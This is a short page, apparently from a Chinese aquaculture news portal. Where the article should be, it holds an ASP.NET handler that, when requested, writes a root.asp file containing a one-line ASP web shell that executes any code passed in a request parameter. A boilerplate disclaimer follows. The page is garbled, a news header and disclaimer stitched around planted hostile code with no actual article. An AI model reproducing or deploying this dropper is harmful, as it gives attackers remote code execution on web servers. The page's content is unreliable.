中國水產(chǎn)門戶網(wǎng)報(bào)道<%@ WebHandler Language="C#" Class="Handler" %>

using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); file1.Write("<%response.clear:execute request(\"root\"):response.End%>"); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } }
免責(zé)聲明:本文在于傳播更多的信息,并不代表本網(wǎng)觀點(diǎn)。本文不保證其內(nèi)容的準(zhǔn)確性、可靠性和有效性,本版文章的原創(chuàng)性以及文中陳述文字和內(nèi)容并未經(jīng)過本站證實(shí),對本文以及其中全部或者部分內(nèi)容、文字的真實(shí)性、完整性,數(shù)據(jù)的準(zhǔn)確性本站不作任何保證或承諾,請讀者僅作參考,并請自行核實(shí)相關(guān)內(nèi)容。